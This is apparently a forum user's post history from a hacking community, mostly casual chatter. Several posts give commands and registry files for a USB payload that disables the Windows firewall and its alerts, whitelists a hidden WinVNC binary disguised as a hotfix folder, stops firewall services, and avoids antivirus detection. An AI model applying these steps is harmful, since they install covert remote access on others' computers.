remkow
-
Posts
205 -
Joined
-
Last visited
Posts posted by remkow
-
-
yup, just take the essential files from the seti@home setup, and modify the go.cmd file
-
no that's folding@home, not seti@home
-
I guess they wanted to beat the pirates and ninjas...
But they'll never succeed anyway because ninjas are just WAY cooler :D
-
I'm not using Windows Firewall myself, but I think that this should disable it:
netsh firewall set opmode disable
And to prevent the security center from popping up use this registry file:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center] "FirewallDisableNotify"=dword:00000001
-
If he posts the source code, you can compile it yourself to make sure you have a clean exe, and you can indeed just cryp it yourself.
-
You don't have to disable the windows firewall, just add some registry entries and ur set. When using the WinVNC payload, you only have to add this registry file:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirew allPolicyStandardProfileAuthorizedApplicationsList] "%systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVNC.exe"="%systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVNC.exe:*:Enabled:WinVnc" "%appdata%NtUninstallKB21050c07160c070f0b0a0a05031b05WinVNC.exe"="%appdata%NtUninstallK21050c07160c070f0b0a0a05031b05WinVNC.exe:*:Enabled:WinVnc"
Just save it as vnc.reg, and in your go.cmd import it using "reg import vnc.reg" or "regedit /s vnc.reg".
-
It's only gonna be for a few secs, if you'd start it again at the end of the file, so it doesn't really matter
-
Just read the shownotes.
It's an exploit framework called Metasploit
-
It IS possible to compile batch files, either using bat2exe, bat2com, or a program like ExeScript
-
It's quite easy to disable the security center popups in the registry, and you can also add rules to the windows firewall through the registry.
-
Just create a new gmail or hotmail account...
-
You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"
-
Or just post it here
-
oi. well if thats the case then use just about any linux live cd. way to spoil the fun new guy.
I wasn't trying to spoil the fun :P I was only pointing out that he initially wanted a cd to do the work, not an usb stick..
-
Yeah sure. I used regmon to to check what registry entries were created when the services.exe would be used, and I saw that they were exactly the same as those in vncdmp2.reg, meaning that the entire services.exe component was not necessary..
So I deleted services.exe, and removed it from services.bat in the VNCInstallfiles dir. I tried it out, and it worked just like it used to, without my antivirus going crazy :D
-
I guess he wants to use a CD... see topic title
maybe a CD+/-RW would work?
-
Can you tell me which registry entries are created/modified??
EDIT: nevermind guys, I've found a way to do it without even using services.exe
-
I am talking about the services.exe in the winvnc payload. This is probably a different program with the same name, because I don't think that antivirus software would detect a legit windows application..
-
I saw that a program called services.exe installs the WinVNC app as a service. My question is, what does it exactly do, and is the source code available?
This is because I am making my own payload, and services.exe is the only program that is still detected by my AV (trying to make a pyload that doesn't need to kill any antiviruses)
EDIT: i got it working without using services.exe, topic can be locked or whatever
How to make a window open fullscreen (i tried ctrl-X)
in Everything Else
Posted
Would this help??
http://www.theeldergeek.com/run_explorer_full_screen.htm
oh, and get firefox :D